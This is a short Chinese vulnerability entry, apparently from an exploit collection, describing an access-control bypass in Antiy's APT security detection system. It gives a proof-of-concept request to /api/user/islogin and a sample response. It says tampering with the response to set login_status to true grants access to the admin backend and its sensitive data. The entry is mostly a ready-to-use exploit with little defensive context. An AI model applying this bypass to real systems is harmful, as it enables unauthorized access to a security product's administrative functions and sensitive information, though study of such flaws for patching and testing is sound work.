安天高级可持续威胁安全检测系统越权访问漏洞

安天高级可持续威胁安全检测系统存在越权访问漏洞，攻击者可以通过工具修改特定的返回包导致越权后台查看敏感信息。

通过抓包修改login_status的参数为true达到越权。

poc：

GET /api/user/islogin HTTP/1.1
Host：target

Response：
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Sun, 18 Apr 2021 10:43:46 GMT
Content-Type: application/json
Content-Length: 51
Connection: close

{"role": "", "login_status": false, "result": "ok"}

ref：

https://mp.weixin.qq.com/s/Bmn4w_OGMnC4PFKJX85p8A

安天高级可持续威胁安全检测系统 越权访问漏洞

安天高级可持续威胁安全检测系统越权访问漏洞